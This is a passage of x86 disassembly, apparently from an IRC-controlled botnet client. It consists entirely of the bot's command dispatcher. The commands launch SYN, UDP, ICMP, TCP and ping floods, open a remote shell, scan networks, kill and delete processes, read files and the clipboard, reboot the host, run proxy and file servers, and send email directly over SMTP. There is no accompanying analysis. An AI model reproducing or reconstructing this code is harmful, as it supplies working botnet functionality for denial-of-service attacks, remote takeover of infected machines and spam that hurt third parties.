lea eax, [ebp+var_1BE8]
push esi
push eax
call sub_413859
xor edi, edi
add esp, 20h
mov [ebp+var_A4], eax
inc edi
loc_4085DC: ; CODE XREF: sub_4078FA+CF7�j
push esi
push 0
call sub_413859
mov [ebp+edi*4+var_A4], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_4085DC
lea eax, [ebp+ebx+var_A4]
mov ecx, [eax]
test ecx, ecx
jz loc_407B7B
add ecx, 3
mov [eax], ecx
loc_408609: ; CODE XREF: sub_4078FA+B2D�j
mov eax, [ebp+ebx+var_A4]
push 8
mov edi, eax
mov esi, offset aRndnick ; "rndnick"
pop ecx
xor edx, edx
repe cmpsb
mov [ebp+var_20], eax
jz loc_40CF95
push 3
mov edi, eax
mov esi, offset aRn ; "rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF95
push 4
mov edi, eax
mov esi, offset aDie ; "die"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4A9
push 2
mov edi, eax
mov esi, offset aD ; "d"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4A9
push 7
mov edi, eax
mov esi, offset aLogout ; "logout"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C3BB
push 3
mov edi, eax
mov esi, offset aLo ; "lo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C3BB
push 8
mov edi, eax
mov esi, offset aVersion ; "version"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C39D
push 4
mov edi, eax
mov esi, offset aVer ; "ver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C39D
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 4
mov edi, eax
mov esi, offset aSec ; "sec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 9
mov edi, eax
mov esi, offset aUnsecure ; "unsecure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 6
mov edi, eax
mov esi, offset aUnsec ; "unsec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 7
mov edi, eax
mov esi, offset aSocks4 ; "socks4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C16A
push 3
mov edi, eax
mov esi, offset aS4 ; "s4"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C16A
push 0Bh
mov edi, eax
mov esi, offset aSocks4stop ; "socks4stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408753
push [ebp+ebx+var_A0]
push 12h
push offset aServer_0 ; "Server"
push offset aSocks4_0 ; "[SOCKS4]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408753: ; CODE XREF: sub_4078FA+E3F�j
push 0Bh
mov edi, eax
mov esi, offset aRloginstop ; "rloginstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40877B
push [ebp+ebx+var_A0]
push 7
push offset aServer_0 ; "Server"
push offset aRlogind ; "[RLOGIND]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40877B: ; CODE XREF: sub_4078FA+E67�j
push 9
mov edi, eax
mov esi, offset aHttpstop ; "httpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4087A3
push [ebp+ebx+var_A0]
push 4
push offset aServer_0 ; "Server"
push offset aHttpd ; "[HTTPD]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4087A3: ; CODE XREF: sub_4078FA+E8F�j
push 8
mov edi, eax
mov esi, offset aLogstop ; "logstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4087CB
push [ebp+ebx+var_A0]
push 1Dh
push offset aLogList ; "Log list"
push offset aLog ; "[LOG]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4087CB: ; CODE XREF: sub_4078FA+EB7�j
push 0Dh
mov edi, eax
mov esi, offset aRedirectstop ; "redirectstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4087F3
push [ebp+ebx+var_A0]
push 11h
push offset aTcpRedirect ; "TCP redirect"
push offset aRedirect_0 ; "[REDIRECT]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4087F3: ; CODE XREF: sub_4078FA+EDF�j
push 0Ah
mov edi, eax
mov esi, offset aDdos_stop ; "ddos.stop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40881B
push [ebp+ebx+var_A0]
push 0Bh
push offset aDdosFlood ; "DDoS flood"
push offset aDdos ; "[DDoS]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40881B: ; CODE XREF: sub_4078FA+F07�j
push 8
mov edi, eax
mov esi, offset aSynstop ; "synstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408843
push [ebp+ebx+var_A0]
push 0Ch
push offset aSynFlood ; "Syn flood"
push offset aSyn ; "[SYN]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408843: ; CODE XREF: sub_4078FA+F2F�j
push 8
mov edi, eax
mov esi, offset aUdpstop ; "udpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40886B
push [ebp+ebx+var_A0]
push 10h
push offset aUdpFlood ; "UDP flood"
push offset aUpd ; "[UPD]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40886B: ; CODE XREF: sub_4078FA+F57�j
push 9
mov edi, eax
mov esi, offset aPingstop ; "pingstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408893
push [ebp+ebx+var_A0]
push 0Fh
push offset aPingFlood ; "Ping flood"
push offset aPing_1 ; "[PING]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408893: ; CODE XREF: sub_4078FA+F7F�j
push 9
mov edi, eax
mov esi, offset aIcmpstop ; "icmpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4088BB
push [ebp+ebx+var_A0]
push 0Eh
push offset aIcmpFlood ; "ICMP flood"
loc_4088B1: ; CODE XREF: sub_4078FA+FDF�j
push offset aIcmp_0 ; "[ICMP]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4088BB: ; CODE XREF: sub_4078FA+FA7�j
push 8
mov edi, eax
mov esi, offset aTcpstop ; "tcpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4088DB
push [ebp+ebx+var_A0]
push 0Dh
push offset aTcpFlood ; "TCP flood"
jmp short loc_4088B1
; ---------------------------------------------------------------------------
loc_4088DB: ; CODE XREF: sub_4078FA+FCF�j
push 9
mov edi, eax
mov esi, offset aTftpstop ; "tftpstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408903
push [ebp+ebx+var_A0]
push 5
push offset aServer_0 ; "Server"
push offset aTftp_0 ; "[TFTP]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408903: ; CODE XREF: sub_4078FA+FEF�j
push 0Ah
mov edi, eax
mov esi, offset aProcsstop ; "procsstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C13B
push 7
mov edi, eax
mov esi, offset aPsstop ; "psstop"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C13B
push 0Ah
mov edi, eax
mov esi, offset aClonestop ; "clonestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408953
push [ebp+ebx+var_A0]
push 18h
push offset aClone ; "Clone"
push offset aClones ; "[CLONES]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408953: ; CODE XREF: sub_4078FA+103F�j
push 0Bh
mov edi, eax
mov esi, offset aSecurestop ; "securestop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40897B
push [ebp+ebx+var_A0]
push 1Ah
push offset aSecure_0 ; "Secure"
push offset aSecure_1 ; "[SECURE]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_40897B: ; CODE XREF: sub_4078FA+1067�j
push 9
mov edi, eax
mov esi, offset aScanstop ; "scanstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_4089A3
push [ebp+ebx+var_A0]
push 9
push offset aScan_1 ; "Scan"
push offset aScan_0 ; "[SCAN]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_4089A3: ; CODE XREF: sub_4078FA+108F�j
push 0Ah
mov edi, eax
mov esi, offset aScanstats ; "scanstats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C122
push 6
mov edi, eax
mov esi, offset aStats ; "stats"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C122
push 0Ah
mov edi, eax
mov esi, offset aReconnect ; "reconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C101
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C101
push 0Bh
mov edi, eax
mov esi, offset aDisconnect ; "disconnect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C0DF
push 3
mov edi, eax
mov esi, offset aDc ; "dc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C0DF
push 5
mov edi, eax
mov esi, offset aQuit_0 ; "quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C095
push 2
mov edi, eax
mov esi, offset aQ ; "q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C095
push 7
mov edi, eax
mov esi, offset aStatus ; "status"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C056
push 2
mov edi, eax
mov esi, offset aS_3 ; "s"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C056
push 3
mov edi, eax
mov esi, offset aId ; "id"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C01E
push 2
mov edi, eax
mov esi, offset aI_0 ; "i"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C01E
push 7
mov edi, eax
mov esi, offset aReboot ; "reboot"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408AE5
call sub_4058F3
test eax, eax
mov eax, offset aMainRebootingS ; "[MAIN]: Rebooting system."
jnz short loc_408AB6
mov eax, offset aMainFailedToRe ; "[MAIN]: Failed to reboot system."
loc_408AB6: ; CODE XREF: sub_4078FA+11B5�j
push eax
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 1Ch
jmp loc_40C4A1
; ---------------------------------------------------------------------------
loc_408AE5: ; CODE XREF: sub_4078FA+11A7�j
push 8
mov edi, eax
mov esi, offset aThreads ; "threads"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF2F
push 2
mov edi, eax
mov esi, offset aT ; "t"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF2F
push 8
mov edi, eax
mov esi, offset aAliases ; "aliases"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF0C
push 3
mov edi, eax
mov esi, offset aAl ; "al"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BF0C
push 4
mov edi, eax
mov esi, offset aLog_0 ; "log"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE19
push 3
mov edi, eax
mov esi, offset aLg ; "lg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BE19
push 9
mov edi, eax
mov esi, offset aClearlog ; "clearlog"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDFD
push 4
mov edi, eax
mov esi, offset aClg ; "clg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDFD
push 8
mov edi, eax
mov esi, offset aNetinfo ; "netinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDC2
push 3
mov edi, eax
mov esi, offset aNi ; "ni"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BDC2
push 8
mov edi, eax
mov esi, offset aSysinfo ; "sysinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD96
push 3
mov edi, eax
mov esi, offset aSi ; "si"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD96
push 8
mov edi, eax
mov esi, offset aDestroy ; "destroy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD19
push 0Bh
mov edi, eax
mov esi, offset aErradicate ; "erradicate"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BD19
push 6
mov edi, eax
mov esi, offset aProcs ; "procs"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BBF3
push 3
mov edi, eax
mov esi, offset aPs ; "ps"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BBF3
push 7
mov edi, eax
mov esi, offset aUptime ; "uptime"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB6C
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB6C
push 0Ah
mov edi, eax
mov esi, offset aDriveinfo ; "driveinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB4F
push 4
mov edi, eax
mov esi, offset aDrv ; "drv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB4F
push 9
mov edi, eax
mov esi, offset aTestdlls ; "testdlls"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB36
push 4
mov edi, eax
mov esi, offset aDll ; "dll"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BB36
push 8
mov edi, eax
mov esi, offset aOpencmd ; "opencmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAF7
push 5
mov edi, eax
mov esi, offset aOcmd ; "ocmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAF7
push 8
mov edi, eax
mov esi, offset aCmdstop ; "cmdstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_408CED
push [ebp+ebx+var_A0]
push 8
push offset aRemoteShell ; "Remote shell"
push offset aCmd_0 ; "[CMD]"
jmp loc_40C14E
; ---------------------------------------------------------------------------
loc_408CED: ; CODE XREF: sub_4078FA+13D9�j
push 4
mov edi, eax
mov esi, offset aWho ; "who"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40902C
cmp [ebp+var_C], edx
jnz short loc_408D20
push edx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_408D20: ; CODE XREF: sub_4078FA+140A�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_408D25: ; CODE XREF: sub_4078FA+1472�j
cmp byte ptr [edi], 0
lea eax, [edi+1]
jnz short loc_408D32
mov eax, offset aEmpty ; "<Empty>"
loc_408D32: ; CODE XREF: sub_4078FA+1431�j
push eax
push esi
lea eax, [ebp+var_2E0]
push offset aD_S ; "%d. %s"
push eax
call sub_412BB5
push 1
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_408D25
push offset aMainLoginListC ; "[MAIN]: Login list complete."
call sub_401C33
mov eax, [ebp+var_20]
pop ecx
loc_408D7C: ; CODE XREF: sub_4078FA+22DD�j
; sub_4078FA+4BC1�j
mov ecx, [ebp+ebx+var_94]
test ecx, ecx
mov [ebp+var_14], ecx
jz loc_407B7B
push 8
mov edi, eax
mov esi, offset aAdvscan ; "advscan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CB69
push 4
mov edi, eax
mov esi, offset aAsc ; "asc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CB69
push 9
mov edi, eax
mov esi, offset aUdpflood ; "udpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA12
push 4
mov edi, eax
mov esi, offset aUdp ; "udp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA12
push 2
mov edi, eax
mov esi, offset aU ; "u"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CA12
push 0Ah
mov edi, eax
mov esi, offset aPingflood ; "pingflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8CF
push 5
mov edi, eax
mov esi, offset aPing_0 ; "ping"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8CF
push 2
mov edi, eax
mov esi, offset aP ; "p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C8CF
push 9
mov edi, eax
mov esi, offset aTcpflood ; "tcpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6C4
push 4
mov edi, eax
mov esi, offset aTcp ; "tcp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C6C4
push 6
mov edi, eax
mov esi, offset aEmail ; "email"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40C4CE
mov eax, [ebp+ebx+var_A0]
lea edx, [ebp+var_B70]
sub edx, eax
loc_408E79: ; CODE XREF: sub_4078FA+1587�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408E79
push [ebp+ebx+var_9C]
call sub_412F42
mov esi, eax
mov eax, [ebp+ebx+var_98]
lea edx, [ebp+var_18E8]
pop ecx
sub edx, eax
loc_408EA1: ; CODE XREF: sub_4078FA+15AF�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408EA1
mov eax, [ebp+var_14]
lea edx, [ebp+var_1340]
sub edx, eax
loc_408EB6: ; CODE XREF: sub_4078FA+15C4�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_408EB6
push offset asc_41FA74 ; " "
push offset a_ ; "_"
push [ebp+ebx+var_90]
call sub_40556E
add esp, 0Ch
lea edx, [ebp+var_19E8]
loc_408EDF: ; CODE XREF: sub_4078FA+15ED�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_408EDF
lea eax, [ebp+var_1D78]
push eax
push 101h
call dword_4334B0 ; WSAStartup
lea eax, [ebp+var_B70]
push eax
call dword_433500 ; gethostbyname
push 6
push 1
push 2
mov ebx, eax
call dword_4334A0 ; socket
mov edi, eax
mov [ebp+var_C8], 2
mov eax, [ebx+0Ch]
mov eax, [eax]
mov eax, [eax]
push esi
mov [ebp+var_C4], eax
call dword_4335EC ; ntohs
mov [ebp+var_C6], ax
lea eax, [ebp+var_19E8]
push eax
lea eax, [ebp+var_18E8]
push eax
lea eax, [ebp+var_19E8]
push eax
lea eax, [ebp+var_1340]
push eax
lea eax, [ebp+var_18E8]
push eax
lea eax, [ebp+var_2178]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_412BB5
add esp, 1Ch
push 10h
lea eax, [ebp+var_C8]
push eax
push edi
call dword_433458 ; connect
xor ebx, ebx
push ebx
mov esi, 100h
push esi
lea eax, [ebp+var_15E4]
push eax
push edi
call dword_433414 ; recv
lea eax, [ebp+var_15E4]
lea ecx, [eax+1]
loc_408FA3: ; CODE XREF: sub_4078FA+16AE�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_408FA3
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_2178]
push eax
push edi
call dword_433534 ; send
push ebx
push esi
lea eax, [ebp+var_15E4]
push eax
push edi
call dword_433414 ; recv
push edi
call dword_4335AC ; closesocket
call dword_4335B8 ; WSACleanup
lea eax, [ebp+var_1340]
push eax
lea eax, [ebp+var_2E0]
push offset aEmailMessageSe ; "[EMAIL]: Message sent to %s."
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], ebx
jnz short loc_409015
push ebx
loc_408FFA: ; CODE XREF: sub_4078FA+35BC�j
; sub_4078FA+3665�j
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
loc_40900D: ; CODE XREF: sub_4078FA+2DA6�j
call sub_4045DD
add esp, 14h
loc_409015: ; CODE XREF: sub_4078FA+16FD�j
; sub_4078FA+2D8E�j ...
mov esi, [ebp+arg_24]
loc_409018: ; CODE XREF: sub_4078FA+35FA�j
; sub_4078FA+361D�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
mov eax, esi
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40902C: ; CODE XREF: sub_4078FA+1401�j
push 8
mov edi, eax
mov esi, offset aGetclip ; "getclip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAB3
push 3
mov edi, eax
mov esi, offset aGc ; "gc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BAB3
push 9
mov edi, eax
mov esi, offset aFlusharp ; "flusharp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA88
push 5
mov edi, eax
mov esi, offset aFarp ; "farp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA88
push 9
mov edi, eax
mov esi, offset aFlushdns ; "flushdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA58
push 5
mov edi, eax
mov esi, offset aFdns ; "fdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA58
push 0Ah
mov edi, eax
mov esi, offset aCurrentip ; "currentip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA1E
push 4
mov edi, eax
mov esi, offset aCip ; "cip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40BA1E
push 0Dh
mov edi, eax
mov esi, offset aRloginserver ; "rloginserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B8E5
push 7
mov edi, eax
mov esi, offset aRlogin ; "rlogin"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B8E5
push 0Bh
mov edi, eax
mov esi, offset aHttpserver ; "httpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B764
push 5
mov edi, eax
mov esi, offset aHttp ; "http"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B764
push 0Bh
mov edi, eax
mov esi, offset aTftpserver ; "tftpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B60D
push 5
mov edi, eax
mov esi, offset aTftp ; "tftp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B60D
push 8
mov edi, eax
mov esi, offset aScanall ; "scanall"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2D2
push 3
mov edi, eax
mov esi, offset aSa ; "sa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2D2
mov ecx, [ebp+ebx+var_A0]
test ecx, ecx
mov [ebp+var_8], ecx
jz loc_407B7B
push 5
mov edi, eax
mov esi, offset aNick_0 ; "nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2AD
push 2
mov edi, eax
mov esi, offset aN ; "n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B2AD
push 5
mov edi, eax
mov esi, offset aJoin ; "join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B289
push 2
mov edi, eax
mov esi, offset aJ ; "j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B289
push 5
mov edi, eax
mov esi, offset aPart_0 ; "part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B26F
push 3
mov edi, eax
mov esi, offset aPt ; "pt"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B26F
push 4
mov edi, eax
mov esi, offset aRaw ; "raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B238
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B238
push 0Bh
mov edi, eax
mov esi, offset aKillthread ; "killthread"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B17E
push 2
mov edi, eax
mov esi, offset aK ; "k"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B17E
push 7
mov edi, eax
mov esi, offset aC_quit ; "c_quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B0D0
push 4
mov edi, eax
mov esi, offset aC_q ; "c_q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B0D0
push 0Ah
mov edi, eax
mov esi, offset aC_rndnick ; "c_rndnick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B07F
push 5
mov edi, eax
mov esi, offset aC_rn ; "c_rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B07F
push 7
mov edi, eax
mov esi, offset aPrefix ; "prefix"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B066
push 3
mov edi, eax
mov esi, offset aPr ; "pr"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B066
push 5
mov edi, eax
mov esi, offset aOpen ; "open"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B030
push 2
mov edi, eax
mov esi, offset aO ; "o"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B030
push 7
mov edi, eax
mov esi, offset aServer ; "server"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B007
push 3
mov edi, eax
mov esi, offset aSe ; "se"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40B007
push 4
mov edi, eax
mov esi, offset aDns ; "dns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF97
push 3
mov edi, eax
mov esi, offset aDn ; "dn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF97
push 9
mov edi, eax
mov esi, offset aKillproc ; "killproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF64
push 3
mov edi, eax
mov esi, offset aKp ; "kp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF64
push 0Ch
mov edi, eax
mov esi, offset aKilldelproc ; "killdelproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF1C
push 4
mov edi, eax
mov esi, offset aKdp ; "kdp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AF1C
push 5
mov edi, eax
mov esi, offset aKill ; "kill"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AEBB
push 3
mov edi, eax
mov esi, offset aKi ; "ki"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AEBB
push 7
mov edi, eax
mov esi, offset aDelete ; "delete"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE69
push 4
mov edi, eax
mov esi, offset aDel ; "del"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE69
push 5
mov edi, eax
mov esi, offset aList_0 ; "list"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE49
push 3
mov edi, eax
mov esi, offset aLi ; "li"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AE49
push 8
mov edi, eax
mov esi, offset aMirccmd ; "mirccmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ADD0
push 5
mov edi, eax
mov esi, offset aMirc ; "mirc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ADD0
push 4
mov edi, eax
mov esi, offset aCmd ; "cmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AD74
push 3
mov edi, eax
mov esi, offset aCm ; "cm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40AD74
push 9
mov edi, eax
mov esi, offset aReadfile ; "readfile"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ACE0
push 3
mov edi, eax
mov esi, offset aRf ; "rf"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40ACE0
push 4
mov edi, eax
mov esi, offset aNet ; "net"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40971F
xor eax, eax
cmp dword_433600, eax
jz short loc_4094A6
cmp dword_433628, eax
jz short loc_4094A6
push offset aNetFailedToLoa ; "[NET]: Failed to load advapi32.dll or n"...
jmp loc_409714
; ---------------------------------------------------------------------------
loc_4094A6: ; CODE XREF: sub_4078FA+1B98�j
; sub_4078FA+1BA0�j
cmp [ebp+var_14], eax
jz loc_40AE14
mov eax, [ebp+ebx+var_9C]
and [ebp+arg_0], 0
test eax, eax
mov [ebp+var_10], eax
jz short loc_4094CF
push eax
push [ebp+var_14]
call sub_413920
pop ecx
pop ecx
mov [ebp+arg_0], eax
loc_4094CF: ; CODE XREF: sub_4078FA+1BC5�j
mov edx, [ebp+var_8]
push 6
mov edi, edx
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40953D
cmp [ebp+var_10], eax
jz short loc_40950B
push [ebp+arg_0]
push 3
loc_4094EC: ; CODE XREF: sub_4078FA+1C58�j
; sub_4078FA+1C6F�j ...
call sub_40668A
push eax
lea eax, [ebp+var_2E0]
push offset aS_1 ; "%s"
push eax
call sub_412BB5
add esp, 14h
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_40950B: ; CODE XREF: sub_4078FA+1BEB�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405DC5
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_409533
push offset aNetServiceList ; "[NET]: Service list completed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_409533: ; CODE XREF: sub_4078FA+1C2D�j
push offset aNetServiceLi_0 ; "[NET]: Service list failed."
jmp loc_40AE0C
; ---------------------------------------------------------------------------
loc_40953D: ; CODE XREF: sub_4078FA+1BE6�j
push 5
mov edi, edx
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409554
push [ebp+arg_0]
push 4
jmp short loc_4094EC
; ---------------------------------------------------------------------------
loc_409554: ; CODE XREF: sub_4078FA+1C51�j
push 6
mov edi, edx
mov esi, offset aPause ; "pause"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40956B
push [ebp+arg_0]
push 5
jmp short loc_4094EC
; ---------------------------------------------------------------------------
loc_40956B: ; CODE XREF: sub_4078FA+1C68�j
push 9
mov edi, edx
mov esi, offset aContinue ; "continue"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_409585
push [ebp+arg_0]
push 6
jmp loc_4094EC
; ---------------------------------------------------------------------------
loc_409585: ; CODE XREF: sub_4078FA+1C7F�j
push 7
mov edi, edx
mov esi, offset aDelete ; "delete"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40959F
push [ebp+arg_0]
push 1
jmp loc_4094EC
; ---------------------------------------------------------------------------
